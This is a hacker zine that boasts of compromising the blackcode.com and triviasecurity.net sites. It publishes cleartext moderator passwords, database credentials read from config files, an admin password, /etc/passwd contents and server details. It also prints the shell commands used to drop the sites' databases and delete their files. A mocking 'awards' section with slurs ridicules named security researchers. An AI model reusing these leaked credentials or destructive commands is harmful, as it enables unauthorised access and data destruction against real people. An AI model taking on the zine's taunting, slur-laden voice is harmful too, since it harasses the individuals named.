~/channels/blackcode -nano harry_botter.pl -cp harry_botter.pl harry_botter.pl.bak -nano harry_botter.pl -exit -cd .silc/scripts/ -ls ../friends/ -ls -nano harry_botter.pl -ls -ls ../ -ls ../clientkeys/ -ls ../ -ls ../friends/ -ls -cd -ls -tail logs/nicklog -tail logs/chatlog -tail logs/chatlog -tail logs/chatlog -tail logs/chatlog -clear -ls -cd .silc/scripts/ -nano harry_botter.pl -ps ax -exit -cd -nano passwd -exit -cd .silc/scripts/ -ls -nano harry_botter.pl -nano harry_botter.pl -ls -ls ../../ -ls ../../channels/ -ls ../../channels/blackcode/ -ls ../../channels/uplinklounge/ -nano harry_botter.pl -ls -cd -ls -mkdir users -cd users/ -ls -nano iadnah -cd -nano .silc/scripts/harry_botter.pl -nano .silc/scripts/harry_botter.pl -nano ~/passwd -nano .silc/scripts/harry_botter.pl -nano ~/passwd -nano .silc/scripts/harry_botter.pl -exit -screen -r -screen silc -screen -exit -cd .silc/scripts/ -nano harry_botter.pl -exit -ls channels/ -ls channels/blackcode/ -ls -cd -screen -r -exit -nano .silc/scripts/harry_botter.pl -ls -ls logs/ -tail logs/userlog -nano .silc/scripts/harry_botter.pl -ls channels/ -ls channels/blackcode/ -ls channels/blackcode/ -ls channels/blackcode/ -ls channels/blackcode/ -ls channels/blackcode/ -ls logs/userlog -tail logs/userlog -nano .silc/scripts/harry_botter.pl -ls channels/ -ls channels/blackcode/ -ls channels/blackcode/ -rm channels/*/* -ls channels/ -ls channels/blackcode/ -ls channels/blackcode/iadnah -ls channels/blackcode/ -touch channels/*/harry_botter -touch channels/blackcode/harry_botter -touch channels/uplinklounge/harry_botter -cd -ls -exit -ls -ls channels/ -ls channels/blackcode/ -rm channels/*/* -ls -ls -ls channels/ -ls channels/blackcode/ -ls channels/blackcode/ -ls channels/blackcode/ -ls channels/blackcode/ -ls channels/blackcode/ -ls channels/blackcode/ -screen -r -exit -ls -cd -ls -nano silc_users.sh -whereis bash -nano silc_users.sh -nano silc_users.sh -chmod +x silc_users.sh -./silc_users.sh -chmod +x silc_users.sh -nano silc_users.sh -./silc_users.sh | sed -e "s/\n/,/g" -./silc_users.sh | sed -e "s/$/,/g" -./silc_users.sh | sed -e "s/\n$/,/g" -./silc_users.sh | sed -e "s/$/,/g" -./silc_users.sh -nano silc_users.sh -php silc_users.sh -php silc_users.sh -nano silc_users.sh -php silc_users.sh -php silc_users.sh -php silc_users.sh -nano silc_users.sh -php silc_users.sh -nano silc_users.sh -php silc_users.sh -nano silc_users.sh -php silc -nano silc_users.sh -php silc_users.sh -nano silc_users.sh -php silc_users.sh -php silc_users.sh -php silc_users.sh -php silc_users.sh -nano silc_users.sh -ls / -ls -lh / -exit -cd users/ -ls -cd .. -ls -nano passwd -ls -lh -chmod 500 passwd -ls -lh -chmod 600 passwd -ls -lh -nano passwd -screen 0r -screen -r -exit -echo -n "7h0mp50n" | md5sum ## I must say, that is quite hilarious, even by your -standards. -echo -n "7h0mp50n" | md5 -nano passwd -cd .silc/ -ls -screen -r -ls -nano scripts/harry_botter.pl -wc -l scripts/harry_botter.pl -nano scripts/harry_botter.pl -exit -$ ls -la /home/lloth/ -total 174808 -drwxr-xr-x 3 lloth lloth 1024 Mar 2 22:53 . -drwxr-xr-x 6 lloth lloth 512 Feb 12 08:33 .. --rw-r--r-- 1 lloth lloth 4967707 Feb 1 13:41 02 oxford comma.mp3 --rw-r--r-- 1 lloth lloth 64291622 Oct 18 2007 -Basktblplayr-ButtonWoodsReturn793.mov --rw-r--r-- 1 lloth lloth 2513877 Apr 9 2007 Bodyrox ft. Luciana - Yeah -Yeah.mp3 --rw-r--r-- 1 lloth lloth 4939904 Nov 2 09:29 Mindless Self Indulgence - -Shut Me Up.mp3 --rw-r--r-- 1 lloth lloth 779392 Mar 20 2006 Owned.mp3 --rw-r--r-- 1 lloth lloth 3139675 Jun 6 2004 Pennywise - Fuck -Authority.mp3 --rw-r--r-- 1 lloth lloth 222252 Oct 14 2004 a-bassy(BC-dis).mp3 --rw-r--r-- 1 lloth lloth 2063045 Feb 10 14:39 asdf.mp3 --rw-r--r-- 1 lloth lloth 1640906 Dec 1 2004 bc-dis.mp3 --rw-r--r-- 1 lloth lloth 685351 Nov 8 2004 bondLOOP2.mp3 -drwxr-xr-x 2 lloth lloth 1024 Feb 25 01:52 forewen --rw-r--r-- 1 lloth lloth 2349 Aug 21 2007 index.html --rw-r--r-- 1 lloth lloth 5123 Aug 15 2007 md5eweng.txt --rw-r--r-- 1 lloth lloth 765181 Dec 1 2004 mylife.mp3 --rw-r--r-- 1 lloth lloth 234582 Oct 22 2004 servermurder.mp3 --rw-r--r-- 1 lloth lloth 5734 Feb 10 19:11 t.c --rw-r--r-- 1 lloth lloth 441822 Oct 5 1999 tm.ps --rw-r--r-- 1 lloth lloth 2403372 Oct 11 2007 wtf.mp3 --rw-r--r-- 1 lloth lloth 36158 Aug 17 2007 zf0investigate.htm ##h0ly -c0w! what is diz ! --rw-r--r-- 1 lloth lloth 18370 Aug 20 2007 zf0logs.txt ##OH NO, THEY -D3T3ct3d uS! - -## INVESTIGATING US HUH -$ head -n 10 zf0investigate.htm -<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" -"http://www.w3.org/TR/html4/strict.dtd"> -<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head><meta -http-equiv="Content-Type" content="text/html; -charset=US-ASCII"> -<!-- base -href="http://www.hakspace.net/blog/99/Hackers_and_Stalkers_-_The_Whitedust_Awar -ds/" --><title>Hakspace.net - -Social Networking For The Digitially Unhinged</title><meta -http-equiv="Content-Language" content="en-gb"><meta -http-equiv="Content-Type" content="text/html; charset=windows-1252"><meta -name="keywords" content="uk underground -hacking internet computer infosec security news independent articles white -papers hacker hack hacking how-to learn wifi -underground cracking forums cracker, Security, Forums, computers, PC, Exploits, -whitedust.net, Anonymity, Privacy, -Spam, Linux, UNIX, Networking, Programming, Firewalls, Routers, Gateway, -Windows, Connectivity, Telecommunications, -Reviews, Cryptography, spyware"><meta name="description" content="The Whitedust -Security Portal is an attempt to bring -back the now forgotten way to repaying the community by putting material of -interest back into it. While many diverse -sources of security news and articles are available on the internet, few of -those sources are specifically targetted at -the security community and none of them are unbiased."><meta name="author" -content="Whitedust Security"><link -rel="stylesheet" href="zf0%20investigate_files/1.htm" type="text/css" -media="screen,projection"></head><body><table -border="1" width="100%"><tbody><tr><td><table color="#ffffff" bgcolor="#ffffff" -border="1" cellpadding="10" -cellspacing="0" width="100%"><tbody><tr><td><font color="black" face="" -size="-1">This is <b><font -color="#0039b6">G</font> <font color="#c41200">o</font> <font -color="#f3c518">o</font> <font color="#0039b6">g</font> -<font color="#30a72f">l</font> <font color="#c41200">e</font></b>'s <a -href="http://www.google.com/intl/en/help/features.html#cached"><font -color="blue">cache</font></a> of <a -href="http://www.hakspace.net/blog/99/Hackers_and_Stalkers_-_The_Whitedust_Awar -ds/"><font -color="blue">http://www.hakspace.net/blog/99/Hackers_and_Stalkers_-_The_Whitedu -st_Awards/</font></a> as retrieved on -Aug 10, 2007 00:35:35 GMT.<br> -<b><font color="#0039b6">G</font> <font color="#c41200">o</font> <font -color="#f3c518">o</font> <font -color="#0039b6">g</font> <font color="#30a72f">l</font> <font -color="#c41200">e</font></b>'s cache is the snapshot that -we took of the page as we crawled the web.<br> -The page may have changed since that time. Click here for the <a -href="http://www.hakspace.net/blog/99/Hackers_and_Stalkers_-_The_Whitedust_Awar -ds/"><font color="blue">current -page</font></a> without highlighting.<br> -This cached page may reference images which are no longer available. Click here -for the <a -href="http://209.85.165.104/search?q=cache:rUik25m-TQsJ:www.hakspace.net/blog/9 -9/Hackers_and_Stalkers_-_The_Whitedust_Awards/+iLite+hushmail&hl=en&gl= -us&strip=1"><font -color="blue">cached text</font></a> only.<br>To link to or bookmark this page, -use the following url: -<code>http://www.google.com/search?q=cache:rUik25m-TQsJ:www.hakspace.net/blog/9 -9/Hackers_and_Stalkers_-_The_Whitedust_Awards/+iLite+hushmail&hl=en&ct= -clnk&cd=1&gl=us</code></font><br><br><center><font -size="-2"><i>Google is neither affiliated with the authors of this page nor -responsible for its -content.</i></font></center></td></tr> -<tr><td> -<table border="0" cellpadding="0" cellspacing="0"><tbody><tr><td><font -color="black" face="" size="-1">These search -terms have been highlighted: </font></td><td bgcolor="#ffff66"><b><font -color="black" face="" -size="-1">ilite </font></b></td><td bgcolor="#a0ffff"><b><font -color="black" face="" -size="-1">hushmail </font></b></td></tr></tbody></table> -</td></tr></tbody></table></td></tr></tbody></table> -<hr> - -## oh WOW - saving googles of the whitedust expose, that's nice of -## you..something to show my grandkids for sure. - -$ head -n 10 zf0logs.txt -Posted: Mon, 20 August 2007 06:10 - - -access_log.1187222400:www.blackcode.com 128.197.11.30 - - [20/Aug/2007:06:10:20 - -0400] "POST -/forum/index.php?t=post HTTP/1.1" 302 - -"http://www.blackcode.com/forum/index.php?t=post&th_id=2128&reply_to=15347&rid= -0&start=0" "Mozilla/5.0 (X11 -; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 -(Ubuntu-fei sty)" -access_log.1187222400:www.blackcode.com 128.197.11.30 - - [20/Aug/2007:06:10:34 - -0400] "GET -/forum/index.php?t=msg&goto=15464&rid=16216 HTTP/1.1" 200 31587 -"http://www.blackcode.com/forum/index.php?t=post&th_id=2128&reply_to=15347&rid= -0&sta rt=0" -"Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.8.1.4) Gecko/20061201 Fire - fox/2.0.0.4 -(Ubuntu-feisty)" -access_log.1187222400:www.blackcode.com 128.197.11.30 - - [20/Aug/2007:06:10:47 - -0400] "GET -/forum/theme/Blackcode_New/images/msg_edit.gif HTTP/1.1" 200 1854 -"http://www.blackcode.com/forum/index.php?t=msg&goto=15464&rid=16216" -"Mozilla/5.0 (X11; U; -Linux x86_64; en-US; rv:1.8.1.4) Gecko/20061201 Firefox/2.0.0.4 (Ubunt - u-feisty)" -access_log.1187222400:www.blackcode.com 128.197.11.30 - - [20/Aug/2007:06:10:47 - -0400] "GET -/forum/blank.gif HTTP/1.1" 200 43 -"http://www.blackcode.com/forum/index.php?t=msg&goto=15464&rid=16216" -"Mozilla/5.0 -(X11; U; Linux x86_64; en-US; r v:1.8.1.4) -Gecko/20061201 Firefox/2.0.0.4 (Ubuntu-feisty)" -access_log.1187222400:www.blackcode.com 82.40.52.38 - - [20/Aug/2007:06:31:06 --0 400] "GET -/forum/index.php?t=ip&ip=128.197.11.30&rid=91 HTTP/1.1" 200 5020 -"https://www.blackcode.com/forum/index.php?t=msg&th=2128&start=0&rid=91" -"Mozilla/5.0 (Windows; -U; Windows NT 5.1; en-GB; rv:1.8.1.2) Gecko/20070219 Firefox/2.0.0.2" - -## mega lulz, you got us! posting on a forum thread (as milamber) wow! nothing -escapes you guys -## Guess you guys didn't follow that investigation up? Didn't own our bounces? - - -And finally the mods cleartexts: - -Lloth asdfghjkl;'1234567890 -Mil U3wc2g9arARR ## HAHA if you check ZF03 his password was: - U3wc1g9arARR, Eleet. -Deadbob 3mm44ndj4ck -L0g1c D1g1tal -Origin qfj62a -poetry this1k26 -ChoHahn (*#ftg#*) -myrmidon666 halo4256 -ootini my3b1akblackcode - - - -We rm'd your site because you openly insulted us, that is not tolerated faggots. -If we're going to send a message then we might as well do it right. -Let this serve you a lesson. You don't want uplinklounge owned too right? - -$ mysql -u fud -p jdn52gj < drop -$ rm -rf bc -rm: bc/public_html/scripts/backups: Permission denied -rm: bc/public_html/scripts: Directory not empty -rm: bc/public_html: Directory not empty -rm: bc: Permission denied -$ id -uid=1006(bc) gid=1005(bc) groups=1005(bc), 10(users), 1003(bcstaff) -$ cd public_html -$ ls -scripts -$ echo g00ns > index.html -$ punt! - -No, g00ns didn't actually hack something notable, that would have been more -shocking than this zine. - -~ - -At around 3:04pm EST today blackcode.com was defaced. Someone claiming to -be "crolox" from g00ns came into IRC and claimed responsibility, but we are -not sure that g00ns had anything to do with this as of yet. We have some -backups to restore from, but the forums and some parts of the download -section may be lost. At this time we believe that the attacker(s) did not -obtain a copy of our sql database, but if you happen to use the same -password for blackcode as for anything else you may want to change it. - -We plan to have the site back online on a new server, and with updated -forum software, as soon as possible. Please bear with us. In the meantime -IRC is still available. - ~Iadnah, May 8, 2008 - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Trivia Security zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -We had this since zf03 but we thought it was a too shitty of an own to release. -However their shitty banner poked my eyes for too long on a lot of h4x0r sites. -It took us less than two minutes to get command execution on their shitty -misconfigured server. Even though we placed forum logging for usernames and -passwords the list is too shitty to release. We had to drop their databases and -hope they'll never return because all that shittiness is just excessive. - -apache-3.00$ cat Settings.php -<?php -# Garbage cutage - -########## Forum Info ########## -$mbname = 'TriviaSecurity Forums'; # The name of your forum. -$language = 'english'; # The default language file set for the -forum. -$boardurl = 'http://triviasecurity.net/boards'; # URL to your -forum's folder. (without the trailing /!) -$webmaster_email = 'd@dan.com.np'; # Email address to send -emails from. (like noreply@yourdomain.com.) -$cookiename = 'SMFCookie293'; # Name of the cookie to set for -authentication. - -########## Database Info ########## -$db_server = 'localhost'; -$db_name = 'triviasec_forums'; -$db_user = 'triviasec_forums'; -$db_passwd = 'SStd1145~rr'; -$db_prefix = 'smf_'; -$db_persist = 0; -$db_error_send = 1; -// amado mod -$ts_exploits_table = 'triviasec_exploits.exploits2'; -$ts_lib_dir = '/home/triviasec/domains/triviasecurity.net/public_html/lib'; -$ts_exploits_dir = -'/home/triviasec/domains/triviasecurity.net/public_html/exploits'; -$ts_exploits_url = 'http://www.triviasecurity.net/exploits'; -$dls_db = 'triviasec_downloads'; -$ts_portal_db = 'triviasec_portal'; -$ts_games_db = 'triviasec_games'; - - $board_address = 'http://triviasecurity.net/boards/index.php'; - $register_url = -'http://triviasecurity.net/boards/index.php?action=register'; - $login_url = 'http://triviasecurity.net/boards/index.php?action=login'; - -$stats_table = 'triviasec_games.trivia_games_stats'; -$users_table = 'triviasec_forums.smf_members'; -$levels_table = 'triviasec_games.trivia_games_levels'; - - $ts_dls_path = 'http://triviasecurity.net/lib/'; - - $guest_url = $board_address; - - - $now = time(); - - -########## Directories/Files ########## -# Note: These directories do not have to be changed unless you move things. -$boarddir = '/home/triviasec/domains/triviasecurity.net/public_html/boards'; - # The absolute path to the forum's folder. -(not just '.'!) -$sourcedir = -'/home/triviasec/domains/triviasecurity.net/public_html/boards/Sources'; - # Path to the Sources directory. - -########## Error-Catching ########## -# Note: You shouldn't touch these settings. -$db_last_error = 0; - - -# Make sure the paths are correct... at least try to fix them. -if (!file_exists($boarddir) && file_exists(dirname(__FILE__) . -'/agreement.txt')) - $boarddir = dirname(__FILE__); -if (!file_exists($sourcedir) && file_exists($boarddir . '/Sources')) - $sourcedir = $boarddir . '/Sources'; - -?> - -apache-3.00$ cat /etc/passwd -root:x:0:0:root:/root:/bin/bash -bin:x:1:1:bin:/bin:/sbin/nologin -daemon:x:2:2:daemon:/sbin:/sbin/nologin -adm:x:3:4:adm:/var/adm:/sbin/nologin -lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin -sync:x:5:0:sync:/sbin:/bin/sync -shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown -halt:x:7:0:halt:/sbin:/sbin/halt -mail:x:8:12:mail:/var/spool/mail:/sbin/nologin -news:x:9:13:news:/etc/news: -uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin -operator:x:11:0:operator:/root:/sbin/nologin -games:x:12:100:games:/usr/games:/sbin/nologin -gopher:x:13:30:gopher:/var/gopher:/sbin/nologin -ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin -nobody:x:99:99:Nobody:/:/sbin/nologin -dbus:x:81:81:System message bus:/:/sbin/nologin -vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin -rpm:x:37:37::/var/lib/rpm:/sbin/nologin -haldaemon:x:68:68:HAL daemon:/:/sbin/nologin -netdump:x:34:34:Network Crash Dump user:/var/crash:/bin/bash -nscd:x:28:28:NSCD Daemon:/:/sbin/nologin -sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin -rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin -mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin -smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin -rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin -nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin -pcap:x:77:77::/var/arpwatch:/sbin/nologin -xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin -pegasus:x:66:65:tog-pegasus OpenPegasus WBEM/CIM -services:/var/lib/Pegasus:/sbin/nologin -ltadmin:x:500:500::/home/ltadmin:/bin/bash -named:x:25:25:Named:/var/named:/sbin/nologin -apache:x:100:501::/var/www:/bin/false -diradmin:x:101:101::/usr/local/directadmin:/bin/bash -mysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash -webapps:x:501:502::/var/www/html:/bin/bash -majordomo:x:103:2::/etc/virtual/majordomo:/bin/bash -admin:x:502:503::/home/admin:/bin/bash -triviasec:x:503:504::/home/triviasec:/bin/bash -tshostru:x:504:505::/home/tshostru:/bin/bash -irad:x:505:506::/home/irad:/bin/false -ddan:x:506:507::/home/ddan:/bin/bash -cadnepal:x:507:508::/home/cadnepal:/bin/bash -talk2w:x:508:509::/home/talk2w:/bin/false -ehak:x:509:510::/home/ehak:/bin/false -redeye:x:510:511::/home/redeye:/bin/false -defusion:x:511:512::/home/defusion:/bin/bash -madoresel:x:512:513::/home/madoresel:/bin/false -wikis:x:513:514::/home/wikis:/bin/false -spin:x:515:516::/home/spin:/bin/false -niid:x:516:517::/home/niid:/bin/false -nag:x:517:518::/home/nag:/bin/false -nuthead:x:518:519::/home/nuthead:/bin/bash -crypted:x:519:520::/home/crypted:/bin/false -oziriz:x:520:521::/home/oziriz:/bin/false -tsorg:x:521:522::/home/tsorg:/bin/bash -groupt:x:523:524::/home/groupt:/bin/false -bitsaa:x:524:525::/home/bitsaa:/bin/false -cad:x:525:526::/home/cad:/bin/bash -nepalj:x:526:527::/home/nepalj:/bin/bash - -apache-3.00$ cat /etc/named.conf # more shitty sites here -// Default named.conf generated by install of bind-9.2.4-2 -options { - directory "/var/named"; - dump-file "/var/named/data/cache_dump.db"; - statistics-file "/var/named/data/named_stats.txt"; -}; -include "/etc/rndc.key"; - -zone "newinst.layeredtech.com" { type master; file -"/var/named/newinst.layeredtech.com.db"; }; -zone "triviasecurity.net" { type master; file -"/var/named/triviasecurity.net.db"; }; -zone "irad.com.np" { type master; file "/var/named/irad.com.np.db"; }; -zone "dan.com.np" { type master; file "/var/named/dan.com.np.db"; }; -zone "cad.com.np" { type master; file "/var/named/cad.com.np.db"; }; -zone "talktoworlds.com" { type master; file "/var/named/talktoworlds.com.db"; -}; -zone "ethicalhackers.org" { type master; file "/var/named/ethicalhackers.org.db"; }; -zone "redeye.triviasecurity.com.ru" { type master; file "/var/named/redeye.triviasecurity.com.ru.db"; }; -zone "defusion.triviasecurity.com.ru" { type master; file "/var/named/defusion.triviasecurity.com.ru.db"; }; -zone "triviasecurity.com.ru" { type master; file "/var/named/triviasecurity.com.ru.db"; }; -zone "i-do-concrete.com" { type master; file "/var/named/i-do-concrete.com.db"; }; -zone "wikisecure.net" { type master; file "/var/named/wikisecure.net.db"; }; -zone "spinstorm.triviasecurity.com.ru" { type master; file "/var/named/spinstorm.triviasecurity.com.ru.db"; }; -zone "niid.com.np" { type master; file "/var/named/niid.com.np.db"; }; -zone "nag.co.in" { type master; file "/var/named/nag.co.in.db"; }; -zone "villain.triviasecurity.com.ru" { type master; file "/var/named/villain.triviasecurity.com.ru.db"; }; -zone "triviasecurity.org" { type master; file "/var/named/triviasecurity.org.db"; }; -zone "grouptater.com" { type master; file "/var/named/grouptater.com.db"; }; -zone "dark-hack.net" { type master; file "/var/named/dark-hack.net.db"; }; -zone "bitsaa.in" { type master; file "/var/named/bitsaa.in.db"; }; -zone "cadnepal.com" { type master; file "/var/named/cadnepal.com.db"; }; -zone "source2nepal.com" { type master; file "/var/named/source2nepal.com.db"; -}; -zone "jnepal.com" { type master; file "/var/named/jnepal.com.db"; }; - -apache-3.00$ ls -al ../ -total 440 -drwxr-xr-x 17 triviasec triviasec 4096 Feb 22 21:39 . -drwx--x--x 8 triviasec triviasec 4096 Jun 27 2007 .. --rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 400.shtml --rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 401.shtml --rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 403.shtml --rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 404.shtml --rwxr-xr-x 1 triviasec triviasec 515 May 8 2007 500.shtml --rw-r--r-- 1 triviasec triviasec 15709 Jun 26 2007 aboutus.gif -drwxr-xr-x 7 triviasec triviasec 4096 Feb 7 02:27 amado -drwxr-xr-x 2 triviasec triviasec 4096 Aug 3 2007 awstats -drwxr-xr-x 5 triviasec triviasec 4096 Jul 9 2007 blog -drwxr-xr-x 9 triviasec triviasec 4096 Jan 8 19:40 boards --rw-r--r-- 1 triviasec triviasec 165 Jan 9 19:21 c-b-m.gif -drwxr-xr-x 2 triviasec triviasec 4096 Jun 26 2007 cgi-bin --rw-r--r-- 1 triviasec triviasec 3401 Jan 24 18:50 contact.php --rw-r--r-- 1 triviasec triviasec 196 Feb 22 21:35 crossdomain.xml -drwxrwxrwx 4 triviasec triviasec 221184 Mar 2 16:43 exploits --rw-r--r-- 1 triviasec triviasec 3977 Jan 27 06:02 exploits.php -drwxr-xr-x 12 triviasec triviasec 4096 Oct 27 13:22 games --rw-r--r-- 1 triviasec triviasec 1329 Jan 26 19:19 getimg.php --rw-r--r-- 1 triviasec triviasec 111 Dec 23 22:27 .htaccess --rw-r--r-- 1 triviasec triviasec 4774 Dec 22 15:57 .htimport-lib.php -drwxr-xr-x 2 triviasec triviasec 4096 Jan 9 19:21 images --rw-r--r-- 1 triviasec triviasec 5362 Dec 24 04:24 index2.php --rw-r--r-- 1 triviasec triviasec 2127 Jan 18 00:19 indexold.php --rw-r--r-- 1 triviasec triviasec 2992 Jan 27 02:59 index.php -drwxrwxrwx 50 triviasec triviasec 4096 Jan 15 00:43 lib --rw-r--r-- 1 triviasec triviasec 8763 Jan 28 21:21 library.php --rwxr-xr-x 1 triviasec triviasec 13954 Sep 15 2006 logo.jpg --rw-r--r-- 1 triviasec triviasec 5591 Dec 24 17:55 lt180.gif --rw-r--r-- 1 triviasec triviasec 9307 Nov 4 16:47 lt.gif -drwxr-xr-x 4 triviasec triviasec 4096 Jan 18 04:48 minimal -drwxr-xr-x 9 triviasec triviasec 4096 Dec 23 17:13 search -drwxr-xr-x 2 triviasec triviasec 4096 Jan 8 02:19 ssb -drwxr-xr-x 2 triviasec triviasec 4096 Feb 22 21:39 temp --rw-r--r-- 1 triviasec triviasec 2616 Jan 27 17:30 triviasecurity-portal2.css --rw-r--r-- 1 triviasec triviasec 2943 Jan 18 20:41 triviasecurity-portal.css -drwxr-xr-x 2 triviasec triviasec 4096 Jan 28 21:20 ts_images --rw-r--r-- 1 triviasec triviasec 12544 Jan 13 20:32 video-tutorials.php -drwxr-xr-x 2 triviasec triviasec 4096 Jan 5 21:44 xss - -apache-3.00$ cat -/home/triviasec/domains/triviasecurity.net/public_html/blog/wp-config.php -<?php -// ** MySQL settings ** // -define('DB_NAME', 'triviasec_blog'); // The name of the database -define('DB_USER', 'triviasec_blog'); // Your MySQL username -define('DB_PASSWORD', 'xx11210gAF~'); // ...and password -define('DB_HOST', 'localhost'); // 99% chance you won't need to change this -value -define('DB_CHARSET', 'utf8'); -define('DB_COLLATE', ''); - -apache-3.00$ /sbin/ifconfig -eth0 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B - inet addr:216.32.75.202 Bcast:216.32.75.207 Mask:255.255.255.248 - inet6 addr: fe80::211:11ff:fe9a:ca3b/64 Scope:Link - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - RX packets:108598803 errors:0 dropped:0 overruns:0 frame:0 - TX packets:120335659 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:1000 - RX bytes:3949315937 (3.6 GiB) TX bytes:139294509 (132.8 MiB) - -eth0:0 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B - inet addr:216.32.75.203 Bcast:216.32.75.207 Mask:255.255.255.248 - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - -eth0:1 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B - inet addr:216.32.75.204 Bcast:216.32.75.207 Mask:255.255.255.248 - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - -eth0:2 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B - inet addr:216.32.75.205 Bcast:216.32.75.207 Mask:255.255.255.248 - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - -eth0:3 Link encap:Ethernet HWaddr 00:11:11:9A:CA:3B - inet addr:216.32.75.206 Bcast:216.32.75.207 Mask:255.255.255.248 - UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 - -lo Link encap:Local Loopback - inet addr:127.0.0.1 Mask:255.0.0.0 - inet6 addr: ::1/128 Scope:Host - UP LOOPBACK RUNNING MTU:16436 Metric:1 - RX packets:2488859 errors:0 dropped:0 overruns:0 frame:0 - TX packets:2488859 errors:0 dropped:0 overruns:0 carrier:0 - collisions:0 txqueuelen:0 - RX bytes:1977563166 (1.8 GiB) TX bytes:1977563166 (1.8 GiB) - -antisemantic-thisisthewayweball # admin's passwd - -/*****************************************************************/ - -apache-3.00$ echo 'drop database triviasec_blog;' > triviasec_blog -apache-3.00$ mysql -utriviasec_blog -pxx11210gAF~ < triviasec_blog -apache-3.00$ echo 'drop database triviasec_forums;' > triviasec_forums -apache-3.00$ echo 'drop database triviasec_downloads;' >> triviasec_forums -apache-3.00$ echo 'drop database triviasec_portal;' >> triviasec_forums -apache-3.00$ echo 'drop database triviasec_games;' >> triviasec_forums -apache-3.00$ mysql -utriviasec_forums -pSStd1145~rr < triviasec_forums -apache-3.00$ - - -apache-3.00$ uname -a -Linux triviasecurity.net 2.6.9-67.0.4.ELsmp #1 SMP Sun Feb 3 07:08:57 EST 2008 i686 i686 i386 GNU/Linux - - - - -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0 zf0 -zf0 Pwnie Awards zf0 -zf0 zf0 -zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 zf0 -zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0zf0 - - - -Ladies and gentlemen, and other esteemed members of our audience, tonight we've -spent some time looking at certain well known people in the security industry in -order to bring you a _very_ special treat -- the first ever ZF0 pwnie awards!! - -It was very hard to narrow down the vast number of unwitting applicants we had, -but alas, there are only so many categories. I'm sure that the others we -didn't mention can be awarded some sort of award in #phrack@EFNet or on FD so -they won't feel left out. - -Aaaaannnnd now, the moment you've all been so eagerly anticipating, let's roll -out the red carpet and break out the theme music for our winners! - -Firstly, in an ever popular category these days, We have our nominations for the -"Most narrowly directed researcher" award. The nominations were: - 1. kuza55 -- Some guy who presented at MS's bluehat conference about the -dangers of XSS. XSS effects us all, and we should all work to eradicate it by -writing a tutorial on how to exploit XSS vulns for our local l33t h4qr website -and post a zillion and ten XSS advisories on milw0rm/FD/bugtraq a day. - 2. Luigi Auriemma -- A relative newcomer to the security industry, he -has never-the-less been extremely active in posting basic web vulns and easy -stack overflows against Windows apps on milw0rm and FD. I mean, there's nothing -like auditing five year old code that no one uses for strcpy() eh? - 3. RSnake -- This man again is well known for his XSS skillz. His -famous XSS cheat sheet provides encodings for things like <, > /, etc in various -formats for people too lazy to code an ASCII/hex/unicode converter or too lazy -to run `man ascii'. A real winner. His web skillz are so legendary that he's -spoken at many conferences and even has several blogs where he talks about such -interesting topics like CSRF (and of course XSS). - -Ahem. And the winner is....... RSNAKE!!!! Congratulations Rsnake, you have won -the award for Most Narrowly Directed Researcher! If you'd be so kind, you can -send your acceptance speech to our email address, superheroes@hushmail.com. -Oh, and if you'd like to add another award to your already vast collection, -learn how to use a compiler and you may get another pwnie, that of Biggest -Masturbator. Speaking of which... - -Biggest Masturbator. This is one of the most highly valued awards because it -means that the nominees are all far too busy getting their hax on to think about -having a sex life. *Ever*. Remember, these researchers are not a dime a dozen, -and each of them can do things that make #blackhats@EFNet members get hardons. -And, in no 